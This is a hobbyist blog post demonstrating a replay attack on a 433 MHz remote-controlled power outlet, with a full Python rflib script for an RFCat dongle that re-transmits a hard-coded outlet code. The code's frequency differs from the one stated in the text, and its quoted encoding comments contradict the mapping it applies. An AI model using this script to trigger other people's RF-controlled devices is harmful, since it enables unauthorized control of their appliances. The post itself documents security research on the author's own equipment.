Replay Attack: Remote Control Outlets and RFCat

In my previous post, I discussed the possibility of controlling one of those handy remote controlled outlets. Well, I got a hold of one, and decided to put my previous post to the test. I’ve even included a video, along with the code that I used. What more could you ask for? In the video, I attach my monitor to the remote control outlet switch and use my RFCat device flashed in my previous previous post to send a custom packet of data via 433.925MHz to the device. As you can see, the same signal is sent each time, turning the device on and off via its relay.

To better understand what is going on in this code, refer to my previous post that I have mentioned numerous times already.

#!/usr/bin/env python

import sys
import time
from rflib import *
from struct import *
import argparse
import pprint
import bitstring


keyLen = 0
baudRate = (1 / 0.000158) # pulse width
frequency = 433945000
repeatNum = 5

def ConfigureD(d):
	d.setMdmModulation(MOD_ASK_OOK)
	d.setFreq(frequency)
	d.makePktFLEN(keyLen)
	d.setMdmDRate(baudRate)
	d.setMaxPower()
	d.setMdmSyncMode(0)
	
	print "[+] Radio Config:"
	print " [-] ---------------------------------"
	print " [-] MDMModulation: MOD_ASK_OOK"
	print " [-] Frequency: ",frequency
	print " [-] Packet Length:",keyLen
	print " [-] Baud Rate:",baudRate
	print "[-] ---------------------------------"


#raw what we are sending	  
bin_str_key =  "1111010101010101110000010"; # This is the RC Switch Outlet payload;

#make it longer so it looks right
long_bin_key = "";

for k in bin_str_key:
	x = "*"
	if(k == "1"):
		x = "11100" # <mossmann> A zero is encoded as a longer high pulse (high-high-low)
	if(k == "0"):
		x = "1000" #<mossmann> and a one is encoded as a shorter high pulse (high-low-low).
	long_bin_key = long_bin_key + x

print "[+] Binary (PWM) key:\n\t",long_bin_key,"\n"

# Elongate this by 7 iterations since this is what the remote outlet switch requires
long_bin_key_modified = long_bin_key*7;

key_packed = bitstring.BitArray(bin=long_bin_key_modified).tobytes()


keyLen = len(key_packed)

print "[+] Key len:\n\t",keyLen,"\n"
print "[+] Key:\n\t", key_packed.encode('hex'),"\n"
print ""

d = RfCat()
ConfigureD(d)

print "[%] Transmitting key: ",repeatNum," times\n"

d.makePktFLEN(keyLen)
for i in range(0,repeatNum):
	sys.stdout.write( "." )
	d.RFxmit(key_packed)

sys.stdout.write("Done.\n")
This entry was posted in Uncategorized. Bookmark the permalink.

7 Responses to Replay Attack: Remote Control Outlets and RFCat

  1. Pingback: Hacking Radio Controlled Outlets

  2. Pingback: rndm(mod) » Hacking Radio Controlled Outlets

  3. Pingback: Hacking Radio Controlled Outlets - RaspberryPiBoards

  4. Pingback: Hacking Radio Controlled Outlets — Blog of MPRosa

  5. Pingback: Hacking Radio Controlled Outlets - | Noticias de seguridad informática, ¿qué es la seguridad informática?

  6. Pingback: Hacking Radio Controlled Outlets - Tech key | Techzone | Tech data

  7. Pingback: Hacking Radio Controlled Outlets | Hack The Planet

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

Current day month ye@r *